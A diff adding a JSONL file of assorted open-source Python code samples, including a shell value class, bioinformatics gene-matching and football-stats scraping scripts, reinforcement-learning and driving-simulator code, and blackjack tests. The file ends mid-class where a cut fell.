diff --git "a/052.jsonl" "b/052.jsonl" new file mode 100644--- /dev/null +++ "b/052.jsonl" @@ -0,0 +1,309 @@ +{"seq_id":"408642402","text":"#!/usr/bin/env python3\n# Copyright 2016 Andy Chu. All rights reserved.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n\"\"\"\nvalue.py - Representation of runtime values.\n\"\"\"\n\n__all__ = ['TValue', 'Value']\n\n\nclass TValue(object):\n STRING = 0\n ARRAY = 1\n EMPTY_UNQUOTED = 2\n\n\nclass Value(object):\n \"\"\"\n Words evaluate to Value. Almost all words evaluate to strings, but\n \"\"\"\n def __init__(self):\n self.type = TValue.STRING # default value is empty string\n self.s = ''\n self.a = []\n\n def __repr__(self):\n if self.type == TValue.STRING:\n return '' % self.s\n elif self.type == TValue.ARRAY:\n return '' % self.a\n elif self.type == TValue.EMPTY_UNQUOTED:\n return '' % self.a\n else:\n raise AssertionError\n\n @staticmethod\n def FromString(s):\n assert isinstance(s, str), s\n v = Value()\n v.s = s\n return v\n\n @staticmethod\n def FromArray(a):\n v = Value()\n v.type = TValue.ARRAY\n v.a = a\n return v\n\n @staticmethod\n def EmptyUnquoted():\n v = Value()\n v.type = TValue.EMPTY_UNQUOTED\n return v\n\n def IsEmptyString(self):\n \"\"\"Return whether the value is an empty string.\n\n Not sure I want this EMPTY_UNQUOTED. Maybe I need a flag on raw strings:\n \"elide if whole word\" and probably \"do glob\".\n \"\"\"\n if self.type == TValue.EMPTY_UNQUOTED:\n return True\n if self.type == TValue.STRING:\n return self.s == ''\n return False\n\n def AsString(self):\n \"\"\"Return the value as a string, or false.\n\n Returns:\n is_string: bool\n s: string (or None)\n \"\"\"\n if self.type == TValue.STRING:\n assert isinstance(self.s, str), self.s\n return True, self.s\n else:\n return False, None\n\n def AsArray(self):\n \"\"\"Return the value as an array, or false.\n\n Returns:\n is_array: bool\n a: array (or None)\n \"\"\"\n if self.type == TValue.ARRAY:\n assert isinstance(self.a, list), self.a\n return True, self.a\n else:\n return False, None\n\n def IsArray(self):\n \"\"\"Used when indexing like a[@] or a[*].\"\"\"\n return self.type == TValue.ARRAY\n\n def EvalToFirst(self):\n \"\"\"Implement bash semantics, where $a evaluates to $a[0].\"\"\"\n if self.type == TValue.ARRAY:\n if len(self.a) == 0:\n # empty=() interpolates to no args\n return Value.EmptyUnquoted()\n else:\n return Value.FromString(self.a[0])\n else: # STRING\n return self\n\n def AppendTo(self, argv):\n \"\"\"Append the string value or the list values to an argv array.\"\"\"\n if self.type == TValue.STRING:\n argv.append(self.s)\n elif self.type == TValue.ARRAY:\n argv.extend(self.a)\n elif self.type == TValue.EMPTY_UNQUOTED:\n pass\n else:\n raise AssertionError\n","sub_path":"core/value.py","file_name":"value.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"458134294","text":"import sys, json\n\nANNOVAR_OUTPUT = 'ANNOVAR_MODIFIED_ClinVar2019_Patho_HasOMIM_Ambiguous_MGOS.tsv'\nHPOA_MIM_GENE_PAIRS = '/cluster/u/ayang/SyntheticPatients/onto/hpo/HPOA_unique_mim_gene_pairs.json'\nHPOA_ALL_GENES_PATH = '/cluster/u/ayang/SyntheticPatients/onto/hpo/HPOA_unique_genes.json'\n\nout = sys.stdout\nif len(sys.argv) > 1:\n out = open(sys.argv[1], 'w')\n\ndef extract_annovar_labeled_gene(line):\n 
ln = line.strip().split('\\t')\n return ln[12]\n\ndef extract_omim_from_preserved_info_field(line):\n ln = line.strip().split('\\t')[25].split(';')\n clndisdb = [x for x in ln if 'CLNDISDB=' in x][0].split('=')[-1].split(',')\n\n omim = [x for x in clndisdb if 'OMIM:' in x][0]\n\n return omim\n\ndef try_to_get_correct_genesymbol(genes):\n sep = genes.split(';')\n correct_gene = sep[0]\n for gene in sep:\n if gene in hpoa_all_genes:\n correct_gene = gene\n return correct_gene\n\nwith open(HPOA_MIM_GENE_PAIRS) as f:\n hpoa_omim_gene_pairs = set(tuple(pair) for pair in json.load(f))\n\nwith open(HPOA_ALL_GENES_PATH) as f:\n hpoa_all_genes = set(json.load(f))\n\nmatched = 0\nunmatched = 0\n\nwith open(ANNOVAR_OUTPUT) as f:\n for line in f:\n if line[0] == '#':\n print(line.strip(), file=out)\n continue\n \n annovar_labeled_gene = extract_annovar_labeled_gene(line)\n if ';' in annovar_labeled_gene:\n annovar_labeled_gene = try_to_get_correct_genesymbol(annovar_labeled_gene)\n omim = extract_omim_from_preserved_info_field(line)\n\n if tuple([omim, annovar_labeled_gene]) in hpoa_omim_gene_pairs:\n print('{}\\t{}|{}'.format(line.strip(), omim, annovar_labeled_gene), file=out)\n matched += 1\n \n else:\n print('{}\\t.'.format(line.strip()), file=out)\n unmatched += 1\n\nprint('Successfully matched {} variants from ANNOVAR output that had (OMIM, gene) pairs in HPO-A.'.format(matched))\nprint('Could not match {} variants because (OMIM, gene) pair not found in HPO-A.'.format(unmatched))\n\n\nif out != sys.stdout:\n out.close()","sub_path":"onto/clinvar/Clean/Ambiguous/MGOS/append_omim_gene_pair_to_annovar_if_possible.py","file_name":"append_omim_gene_pair_to_annovar_if_possible.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"371283534","text":"def computepay (hours, rate):\n\n rateP40 = 0.5\n reghours = 40\n\n try:\n fhours = float(shours)\n frate = float(srate)\n except :\n print('Error, please enter a numeric input')\n quit()\n\n\n if fhours > reghours:\n # Calculate Regular + Extra Pay over 40 Hours\n regpay = fhours * frate\n exthours = (fhours - reghours) * (frate * rateP40)\n\n totalpay = regpay + exthours\n else:\n # Calculate only Regular Pay\n totalpay = fhours * frate\n\n totalpayR = round(totalpay, 2)\n return totalpay\n\n\nshours = input('Enter Hours: ')\nsrate = input('Enter Rate: ')\n\ntotalpayment = computepay(hours, rate)\nprint (totalpayment)\n","sub_path":"Getting Started with Python/Exercise Files/4. 
Functions/Ex_4_6.py","file_name":"Ex_4_6.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"275238645","text":"# -*- coding: utf-8 -*-\n# @Time : 20-6-4 下午2:13\n# @Author : zhuying\n# @Company : Minivision\n# @File : utility.py\n# @Software : PyCharm\n\nfrom datetime import datetime\nimport os\nimport torch\nimport numpy as np\n\ndef get_time():\n return (str(datetime.now())[:-10]).replace(' ', '-').replace(':', '-')\n\n\ndef get_kernel(height, width):\n kernel_size = ((height + 15) // 16, (width + 15) // 16)\n return kernel_size\n\n\ndef get_width_height(patch_info):\n w_input = int(patch_info.split('x')[-1])\n h_input = int(patch_info.split('x')[0].split('_')[-1])\n return w_input,h_input\n\n\ndef parse_model_name(model_name):\n info = model_name.split('_')[0:-1]\n h_input, w_input = info[-1].split('x')\n model_type = model_name.split('.pth')[0].split('_')[-1]\n\n if info[0] == \"org\":\n scale = None\n else:\n scale = float(info[0])\n return int(h_input), int(w_input), model_type, scale\n\ndef parse_model_name_new_format(model_name):\n info = model_name.split('_')[0:-2]\n h_input, w_input = info[-1].split('x')\n model_type = \"MiniFASNetV1SE\"\n\n if info[0] == \"org\":\n scale = None\n else:\n scale = float(info[3])\n return int(h_input), int(w_input), model_type, scale\n\ndef make_if_not_exist(folder_path):\n if not os.path.exists(folder_path):\n os.makedirs(folder_path)\n\n\n\"\"\"\nUse in PyTorch.\n\"\"\"\n\ndef accuracy(output, target):\n \"\"\"Computes the accuracy for multiple binary predictions\"\"\"\n pred = output >= 0.5\n truth = target >= 0.5\n acc = pred.eq(truth).sum() / target.numel()\n return acc\n\n\nclass BinaryClassificationMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.tp = 0\n self.tn = 0\n self.fp = 0\n self.fn = 0\n self.acc = 0\n self.pre = 0\n self.rec = 0\n self.f1 = 0\n\n def update(self, pred, target):\n pred = torch.tensor(pred)\n target = torch.tensor(target)\n self.tp = pred.mul(target).sum(0).float()\n self.tn = (1 - pred).mul(1 - target).sum(0).float()\n self.fp = pred.mul(1 - target).sum(0).float()\n self.fn = (1 - pred).mul(target).sum(0).float()\n self.acc = (self.tp + self.tn).sum() / (self.tp + self.tn + self.fp + self.fn).sum()\n self.pre = self.tp / (self.tp + self.fp)\n self.rec = self.tp / (self.tp + self.fn)\n self.f1 = (2.0 * self.tp) / (2.0 * self.tp + self.fp + self.fn)\n self.avg_pre = np.nanmean(self.pre)\n self.avg_rec = np.nanmean(self.rec)\n self.avg_f1 = np.nanmean(self.f1)\n # print(\"tp, tn, fp, fn: \", self.tp.item(), self.tn.item(), self.fp.item(), self.fn.item())","sub_path":"src/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"282285189","text":"import sys\nimport requests\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nimport time\n\n\n###############################😎 Split LINES IN .TXT FILE & opening WEBDRIVER at the 1st Url #####################################################\n\n\nwith open('links-penalty.txt','r') as fo:\n count=0\n for line in fo:\n count+=1\n \n url=line\n from selenium import webdriver\n driver=webdriver.PhantomJS('/home/jkernel/Desktop/python books/phantomjs/bin/phantomjs',service_args=['--load-images=no','--disk-cache=true'])\n 
driver.get(url)\n time.sleep(3)\n \n ##################################😎 HOME TEAM CONFIG ###################################################\n search_team1_name= driver.find_element_by_css_selector('div.hostteam div.name')\n search_team2_name= driver.find_element_by_css_selector('div.guestteam div.name')\n team1_name= search_team1_name.text\n team2_name= search_team2_name.text\n \n \n \n #Typwnei ta onomata omadwn\n print(team1_name,\"-\",team2_name)\n \n #typwnei tis red cards\n try:\n \tsearch_team1_red_card= driver.find_element_by_css_selector('div.statrow:nth-of-type(2) div.value:nth-of-type(1)')\n \tteam1_red_card=search_team1_red_card.text\n \t\n \tprint(\"Home Team Red Cards: \",team1_red_card)\n \tsearch_team2_red_card= driver.find_element_by_css_selector('div.statrow:nth-of-type(2) div.value:nth-of-type(3)')\n \tteam2_red_card=search_team2_red_card.text\n \tprint(\"Away Team Red Cards: \",team2_red_card) \t\n\n except NoSuchElementException:\n \tprint(\"No red card\")\n \n \n #dokimazei ean yparxei penalty\n try:\t \n\t search_team1_penalty= driver.find_element_by_css_selector('div.penalty')\n\t if(search_team1_penalty.is_displayed()==True):\n\t \tprint(team1_penalty_scored)\n except NoSuchElementException:\n \tprint(\"No penalty found\")\n \n \n \t\n try:\n\t search_penalty_missed= driver.find_element_by_css_selector('div.miss')\n except NoSuchElementException:\n \tprint(\"No missed penalty\")\n try:\n\t search_team1_own_goal= driver.find_element_by_css_selector('div.own')\n\t owngoal=search_team1_own_goal.text\n\t print(owngoal)\n except NoSuchElementException:\n \tprint(\"No own goal\")\n \t\n\n driver.quit()\n print(\"#######################################################\") \n\n\n\n","sub_path":"match_details.py","file_name":"match_details.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"378777470","text":"# coding: utf-8\n\nimport sys\nsys.path.append(\"/opt/tiger/test_ppo\")\n\nimport tensorflow as tf\nimport os\nimport logging\nfrom collections import OrderedDict\nimport glob\nimport argparse\nfrom multiprocessing import Queue, Process\nimport zmq\n\nfrom utils import unpack\n\nfrom zSAC.Worker_SAC import Worker_Q\nfrom zSAC.Trainer_SAC import Model\n\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\nlogging.getLogger('tensorflow').setLevel(logging.ERROR)\n\n\ndef clean(episodic, lifelong, data_dir, postfix):\n if lifelong is not None:\n if episodic >= lifelong:\n episodic -= lifelong\n sEPID = str(episodic)\n sEPID = (8 - len(sEPID)) * \"0\" + sEPID\n pattern = os.path.join(data_dir, sEPID + \"_*.\" + postfix)\n names = glob.glob(pattern)\n for name in names:\n if os.path.exists(name):\n try:\n os.remove(name)\n except FileNotFoundError:\n pass\n\n\ndef run(**kwargs):\n tmplimit = 512\n lifelong = None\n\n server_id = kwargs.get(\"server_id\", 0)\n\n address = \"ipc:///tmp/databack%d\" % server_id\n\n SCRIPT_DIR = kwargs.get(\"SCRIPT_DIR\")\n BASE_DIR = kwargs.get(\"BASE_DIR\")\n CKPT_DIR = kwargs.get(\"CKPT_DIR\")\n DATA_DIR = kwargs.get(\"DATA_DIR\")\n\n logging.basicConfig(\n filename=os.path.join(\n BASE_DIR, \"Serverlog\"),\n level=\"INFO\")\n\n frames = kwargs.get(\"frames\", 1)\n workers = kwargs.get(\"workers\", 16)\n parallel = kwargs.get(\"worker_parallel\", 4)\n MAX_STEPS = kwargs.get(\"max_steps\", 3200)\n seqlen = kwargs.get(\"seqlen\", 32)\n burn_in = kwargs.get(\"burn_in\", 32)\n alpha = kwargs.get(\"alpha\", 1.0)\n\n games = [\"SuperMarioBros-%d-%d-v0\" % 
(i, j) for i in range(1, 9) for j in range(1, 5)]\n\n config = tf.ConfigProto(\n allow_soft_placement=True,\n gpu_options=tf.GPUOptions(\n per_process_gpu_memory_fraction=0.025))\n config.gpu_options.allow_growth = True\n sess = tf.Session(config=config)\n\n phs = dict()\n\n phs[\"s\"] = tf.placeholder(dtype=tf.float32, shape=[None, None, 84, 84, frames])\n phs[\"prev_a\"] = tf.placeholder(dtype=tf.int32, shape=[None, None])\n phs[\"state_in\"] = tf.placeholder(dtype=tf.float32, shape=[None, 128 * 4 * 2])\n phs[\"slots\"] = tf.placeholder(dtype=tf.float32, shape=[None, None])\n\n with tf.device(\"/gpu\"):\n with tf.variable_scope(\"p_lstm\", reuse=tf.AUTO_REUSE):\n plstm = tf.compat.v1.keras.layers.LSTM(\n 128, return_sequences=True, return_state=True, name=\"lstm\")\n with tf.variable_scope(\"q_lstm\", reuse=tf.AUTO_REUSE):\n qlstm = tf.compat.v1.keras.layers.LSTM(\n 128, return_sequences=True, return_state=True, name=\"lstm\")\n with tf.variable_scope(\"v_lstm\", reuse=tf.AUTO_REUSE):\n vlstm = tf.compat.v1.keras.layers.LSTM(\n 128, return_sequences=True, return_state=True, name=\"lstm\")\n with tf.variable_scope(\"v_tar_lstm\", reuse=tf.AUTO_REUSE):\n vtarlstm = tf.compat.v1.keras.layers.LSTM(\n 128, return_sequences=True, return_state=True, name=\"lstm\")\n model = Model(7, plstm, qlstm, vlstm, vtarlstm, \"agent\", **phs)\n\n saver = tf.train.Saver(max_to_keep=None, keep_checkpoint_every_n_hours=6)\n\n # while True:\n # ckpt = tf.train.get_checkpoint_state(CKPT_DIR)\n # if ckpt is not None:\n # ckpt_path = ckpt.model_checkpoint_path\n # if ckpt_path is not None:\n # break\n # sleep_time = 10\n # logging.warning(\"No Model, Sleep %d seconds\" % sleep_time)\n # time.sleep(sleep_time)\n # saver.restore(sess, ckpt_path)\n\n ckpt = tf.train.get_checkpoint_state(CKPT_DIR)\n ckpt_path = None\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n else:\n sess.run(tf.global_variables_initializer())\n\n context = zmq.Context()\n frontend = context.socket(zmq.ROUTER)\n frontend.bind(address)\n\n queue_ins = OrderedDict()\n # queue_out = Queue(maxsize=3 * tmplimit)\n for i in range(workers):\n queue_in = Queue()\n worker_id = i\n queue_ins[worker_id] = queue_in\n\n worker = Process(\n target=Worker_Q,\n args=(queue_in,\n address,\n parallel,\n BASE_DIR,\n DATA_DIR,\n 3 * tmplimit,\n server_id,\n worker_id,\n \"\\t\".join(games),\n frames,\n seqlen,\n burn_in))\n worker.daemon = True\n worker.start()\n\n while True:\n ckpt = tf.train.get_checkpoint_state(CKPT_DIR)\n if ckpt is not None:\n new_ckpt_path = ckpt.model_checkpoint_path\n if new_ckpt_path != ckpt_path:\n ckpt_path = new_ckpt_path\n saver.restore(sess, ckpt_path)\n\n fd = {model.s_t: [],\n model.previous_actions: [],\n model.state_in: []}\n\n idx, msg = frontend.recv_multipart(copy=False)\n worker_id, databack = unpack(msg)\n s, a, state_in = databack\n fd[model.s_t] = s\n fd[model.previous_actions] = a\n fd[model.state_in] = state_in\n\n _a_t_new, _state_out_batch = sess.run(\n [model.get_current_act(),\n model.state_out],\n feed_dict=fd)\n\n dataforward = (_a_t_new,\n _state_out_batch)\n queue_ins[worker_id].put(dataforward)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-SCRIPT_DIR\", type=str,\n default=\"/opt/tiger/test_ppo\")\n parser.add_argument(\"-BASE_DIR\", type=str,\n default=\"/mnt/cephfs_new_wj/arnold/labcv/xiaochangnan\"\n \"/PPOcGAE_SuperMarioBros-v0/2\")\n parser.add_argument(\"-CKPT_DIR\", type=str,\n 
default=\"/mnt/cephfs_new_wj/arnold/labcv/xiaochangnan\"\n \"/PPOcGAE_SuperMarioBros-v0/2/ckpt\")\n parser.add_argument(\"-DATA_DIR\", type=str,\n default=\"/mnt/mytmpfs\")\n parser.add_argument(\"-server_id\", type=int, default=0)\n parser.add_argument(\"-frames\", type=int, default=1)\n parser.add_argument(\"-workers\", type=int, default=4)\n parser.add_argument(\"-worker_parallel\", type=int, default=4)\n parser.add_argument(\"-max_steps\", type=int, default=3200)\n parser.add_argument(\"-seqlen\", type=int, default=32)\n parser.add_argument(\"-burn_in\", type=int, default=32)\n parser.add_argument(\"-alpha\", type=float, default=0.001)\n args = parser.parse_args()\n run(**args.__dict__)\n pass\n","sub_path":"zSAC/Server_SAC.py","file_name":"Server_SAC.py","file_ext":"py","file_size_in_byte":6759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"618068486","text":"import os\nimport shutil\n\ndata_dir = '/Users/luoxiaoliang/Desktop/PhD/_projects/betaextract_lss/data/sub20/'\nnum_run = 1\nnum_trial = 48\n\nfor i in range(1, num_run+1):\n for j in range(1, num_trial+1):\n output_dir = data_dir + 'run%s/output/trial%s.feat/' % (i, j)\n for f in os.listdir(output_dir):\n if f == 'stats':\n pass\n else:\n target = output_dir + f\n if os.path.isfile(target):\n os.remove(target)\n elif os.path.isdir(target):\n shutil.rmtree(target)\n\n stats_dir = data_dir + 'run%s/output/trial%s.feat/stats/' % (i, j)\n for f in os.listdir(stats_dir):\n if f == 'pe1.nii.gz':\n f_rename = \"pe1_r%s_t%s.nii.gz\" % (i, j)\n os.rename(stats_dir+f, stats_dir+f_rename)\n else:\n target = stats_dir + f\n if os.path.isfile(target):\n os.remove(target)\n elif os.path.isdir(target):\n shutil.rmtree(target)\n","sub_path":"code/get_pes_from_output.py","file_name":"get_pes_from_output.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"120028377","text":"import gym\nfrom copy import deepcopy\nimport numpy as np\nfrom gym_urbandriving.assets import TrafficLight, Terrain, Street, Lane, Sidewalk, Car, CrosswalkLight, Pedestrian\nfrom gym_urbandriving.agents import *\nimport json\nimport os\nimport random\nimport six\n\nclass PositionState:\n \"\"\"\n Abstract class representing the objects in a scene\n \"\"\"\n\n def __init__(self, data, car_model=\"kinematic\"):\n self.dimensions = (1000, 1000)\n self.dynamic_objects = {}\n self.time = 0\n self.static_objects = []\n self.start_lanes = []\n self.goal_states = []\n self.agent_config = data['agents']\n self.dynamic_collisions, self.static_collisions, self.controlled_car_collisions = [], [], []\n self.last_coll = -1\n\n if 'state' in data['environment']:\n state_config = data['environment']['state']\n basedir = os.path.dirname(__file__)\n state_config = json.load(open(os.path.join(basedir, \"configs/\", state_config + \".json\")))\n else:\n state_config = data['environment']['state_config']\n\n for obj_info in state_config['static_objects']:\n typ = {\"Terrain\":Terrain, \"Lane\":Lane, \"Street\":Street, \"Sidewalk\":Sidewalk}[obj_info.pop('type')]\n obj = typ(**obj_info)\n self.static_objects.append(obj)\n for obj_info in state_config['car_start_lanes']:\n self.start_lanes.append(Lane(**obj_info))\n\n self.state_config = state_config\n self.goal_states = state_config['goal_states']\n\n\n\n assert (car_model in {\"kinematic\", \"point\", \"reeds_shepp\"})\n self.car_model = car_model\n self.randomize()\n return\n\n def 
randomize(self):\n \"\"\"\n Randomly generates car and pedestrian positions\n \"\"\"\n self.dynamic_objects = {}\n self.dynamic_objects['controlled_cars'] = {}\n self.dynamic_objects['background_cars'] = {}\n self.dynamic_objects['pedestrians'] = {}\n self.dynamic_objects['traffic_lights'] = {}\n\n for car_index in range(self.agent_config['controlled_cars']):\n while True:\n start = np.random.random_integers(0, 3)\n lane = self.start_lanes[start]\n car = lane.generate_car(self.car_model)\n if not self.is_in_collision(car):\n self.dynamic_objects['controlled_cars'][str(car_index)] = car\n self.dynamic_objects['controlled_cars'][str(car_index)].destination = self.assign_goal_states(start)\n break\n\n for car_index in range(self.agent_config['background_cars']):\n while True:\n start = np.random.random_integers(0, 3)\n lane = self.start_lanes[start]\n car = lane.generate_car(self.car_model)\n if not self.is_in_collision(car):\n self.dynamic_objects['background_cars'][str(car_index)] = car\n self.dynamic_objects['background_cars'][str(car_index)].destination = self.assign_goal_states(start)\n break\n\n self.dynamic_objects['traffic_lights'] = {}\n if self.agent_config['use_traffic_lights']:\n\n for i, traffic_light in enumerate(self.state_config['traffic_lights']):\n self.dynamic_objects['traffic_lights'][str(i)] = TrafficLight(**traffic_light)\n self.dynamic_objects['crosswalk_lights'] = {}\n self.dynamic_objects['pedestrians'] = {} \n if self.agent_config['number_of_pedestrians']:\n for i, crosswalk_light in enumerate(self.state_config['crosswalk_lights']):\n self.dynamic_objects['crosswalk_lights'][str(i)] = CrosswalkLight(**crosswalk_light)\n\n start_sidewalks = [s for s in self.static_objects if type(s) == Sidewalk]\n\n for ped_index in range(self.agent_config['number_of_pedestrians']):\n while True:\n start = np.random.random_integers(0, len(start_sidewalks) - 1)\n sidewalk = start_sidewalks[start]\n ped = sidewalk.generate_man()\n if not self.is_in_collision(ped):\n self.dynamic_objects['pedestrians'][str(ped_index)] = ped\n break\n #TODO Add pedestrians\n\n self.create_agents()\n\n def assign_goal_states(self, start_lane):\n \"\"\"\n Assigns a random goal state to a car\n \"\"\"\n goal_choices = deepcopy(self.goal_states)\n del goal_choices[start_lane]\n choice = random.choice(goal_choices)\n\n return [choice['x'], choice['y'], choice['vel'], np.deg2rad(choice['angle_deg'])]\n\n def create_agents(self):\n \"\"\"\n Creates agents for objects in the scene\n \"\"\"\n agent_mappings = {}\n for k, v in six.iteritems(self.agent_config['agent_mappings']):\n agent_mappings[{\"Car\":Car,\n \"TrafficLight\":TrafficLight,\n \"CrosswalkLight\":CrosswalkLight,\n \"Pedestrian\":Pedestrian}[k]] = {\"PlanningPursuitAgent\":PlanningPursuitAgent,\n \"TrafficLightAgent\":TrafficLightAgent,\n \"CrosswalkLightAgent\":CrosswalkLightAgent,\n \"Agent\": Agent,\n \"PedestrianAgent\":PedestrianAgent,\n \"NeuralPursuitAgent\":lambda i:NeuralPursuitAgent(i,\n noise=self.agent_config['bg_state_space_config']['noise'],\n omission_prob=self.agent_config['bg_state_space_config']['omission_prob'])}[v]\n\n self.bg_agents = {}\n for key in self.dynamic_objects.keys():\n if not key == 'controlled_cars':\n self.bg_agents[key] = []\n for i, index in enumerate(self.dynamic_objects[key]):\n obj = self.dynamic_objects[key][index]\n if type(obj) in agent_mappings:\n self.bg_agents[key].append(agent_mappings[type(obj)](i))\n self.bg_agents['controlled_cars'] = []\n for i in range(self.agent_config['controlled_cars']):\n 
action_space = self.agent_config['action_space']\n agent = {'steering':SteeringActionAgent,\n 'velocity':VelocityActionAgent,\n 'trajectory':TrajectoryActionAgent}[action_space](i)\n self.bg_agents['controlled_cars'].append(agent)\n\n def is_in_collision(self,car):\n\n for obj in self.static_objects:\n if car.collides(obj):\n return True\n for key in self.dynamic_objects.keys():\n for i,obj in six.iteritems(self.dynamic_objects[key]):\n if car.collides(obj):\n return True\n return False\n\n\n def get_collisions(self):\n \"\"\"\n Get list of all collisions in this state\n\n Returns\n -------\n list\n List of tuples, where each tuple contains a pair of coliding object indices. Dynamic_collisions contains collisions between cars and other cars.\n list\n The corresponding list for collisions between dynamic objects and static objects\n \"\"\"\n if self.last_coll == self.time:\n return self.dynamic_collisions, self.static_collisions, self.controlled_car_collisions\n self.dynamic_collisions, self.static_collisions, self.controlled_car_collisions = [], [], []\n self.last_coll = self.time\n\n #TODO Fix this. Controlled cars can't collide with background cars\n for key in self.dynamic_objects.keys():\n for i, dobj in self.dynamic_objects[key].items():\n i = int(i)\n\n for j, sobj in enumerate(self.static_objects):\n if dobj.collides(sobj):\n self.static_collisions.append([i, j, key, 'static'])\n\n for inner_key in self.dynamic_objects.keys():\n for j, dobj1 in self.dynamic_objects[inner_key].items():\n j = int(j)\n if (not (i == j and key == inner_key)) and dobj.collides(dobj1):\n self.dynamic_collisions.append([i, j,key, inner_key])\n if key == 'controlled_cars':\n self.controlled_car_collisions.append([i, j,key, inner_key])\n\n return self.dynamic_collisions, self.static_collisions, self.controlled_car_collisions\n\n\n def collides_any(self, agentnum,type_of_agent = 'background_cars'):\n \"\"\"\n Returns if the agentnum object in the scene is colliding with any other object\n\n Parameters\n ----------\n agentnum : int\n The index of the object to query\n\n Returns\n -------\n bool\n True if this object is colliding\n \"\"\"\n\n dynamic_collisions, static_collisions, _ = self.get_collisions()\n for coll in dynamic_collisions:\n id1, id2, t1, t2 = coll\n if (agentnum, type_of_agent) in [(id1, t1), (id2, t2)]:\n return True\n for coll in static_collisions:\n id1, id2, t1, t2 = coll\n if (agentnum, type_of_agent) is (id1, t1):\n return True\n return False\n\n def collides_any_dynamic(self, agentnum,type_of_agent = 'background_cars'):\n dynamic_collisions, static_collisions, _ = self.get_collisions()\n\n for coll in dynamic_collisions:\n id1, id2, t1, t2 = coll\n if (agentnum, type_of_agent) in [(id1, t1), (id2, t2)]:\n return True\n\n return False\n\n def min_dist_to_coll(self, agentnum,type_of_agent = 'background_cars'):\n \"\"\"\n Returns the minimum distance between the object with id agentnum and a collideable object.\n\n Parameters\n ----------\n agentnum : int\n The index of the object to query\n\n Returns\n -------\n float\n Distance to nearest collideable object\n \"\"\"\n min_dist = np.finfo('f').max\n obj = self.dynamic_objects[type_of_agent][agentnum]\n for j, sobj in enumerate(self.static_objects):\n if obj.can_collide(sobj):\n min_dist = min(min_dist, obj.dist_to(sobj))\n\n for key in self.dynamic_objects.keys():\n for j, dobj in enumerate(self.dynamic_objects):\n if j != agentnum and obj.can_collide(dobj):\n min_dist = min(min_dist, obj.dist_to(dobj))\n return min_dist\n\n def 
get_observations(self, observation_type):\n \"\"\"\n Returns a set\n\n Parameters\n ----------\n agentnum : int\n The index of the object to query\n\n Returns\n -------\n float\n Distance to nearest collideable object\n \"\"\"\n","sub_path":"gym_urbandriving/state/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":11222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"146690334","text":"from blackjack.dealer import Dealer\nfrom blackjack.card import Card\nfrom blackjack.hand import Hand\nfrom blackjack.game_options import GameOptions\nfrom blackjack.game import Game\n\n\ndef test_dealer_hit():\n hand = Hand(0, [Card(\"6\", \"clubs\"), Card(\"5\", \"hearts\")])\n dealer = Dealer()\n\n dealer.hand = hand\n\n assert dealer.hit()\n\n\ndef test_dealer_does_not_hit():\n hand = Hand(0, [Card(\"10\", \"clubs\"), Card(\"7\", \"hearts\")])\n dealer = Dealer()\n\n dealer.hand = hand\n\n assert not dealer.hit()\n\n\ndef test_dealer_hits_soft_17():\n hand = Hand(0, [Card(\"6\", \"clubs\"), Card(\"A\", \"hearts\")])\n dealer = Dealer(hit_soft_17=True)\n\n dealer.hand = hand\n\n assert dealer.hit()\n\n\ndef test_dealer_takes_hit():\n options = GameOptions()\n new_game = Game(options, \"Alan\")\n new_game.dealer.hand = Hand(10, [Card(\"2\", \"spades\"), Card(\"J\", \"clubs\")])\n new_game.dealer.takes_hit(new_game.deck.deal())\n","sub_path":"blackjack/tests/test_dealer.py","file_name":"test_dealer.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"529116272","text":"class Logger:\n \"\"\"Logger class. Use to log information and warnings\"\"\"\n def logToConsole(level, text, newline = False):\n if newline:\n print(\"\\n\" + level + \"\" + text)\n else:\n print(level + \"\" + text)\n\n def logValue(value):\n Logger.logToConsole(LogLevel.info, str(value))\n\nclass LogLevel:\n \"\"\"LogLevel\"\"\"\n info = \"[Info] \"\n danger = \"[Danger] \"\n severe = \"[Severe] \"\n success = \"[Success] \"\n","sub_path":"modules/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"90974441","text":"import numpy as np\nfrom itertools import product\nimport re\n\n\nRULES = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 18, 19, 22, 23, 24, 25, 26, 27, 28, 29, 30, 32, 33, \n 34, 35, 36, 37, 38, 40, 41, 42, 43, 44, 45, 46, 50, 51, 54, 56, 57, 58, 60, 62, 72, 73, 74, 76, 77, 78, \n 90, 94, 104, 105, 106, 108, 110, 122, 126, 128, 130, 132, 134, 136, 138, 140, 142, 146, 150, 152, 154, 156, \n 160, 162, 164, 168, 170, 172, 178, 184, 200, 204, 232]\n\n\nclass preimage_ECA():\n def __init__(self, rule):\n self.wolfram = 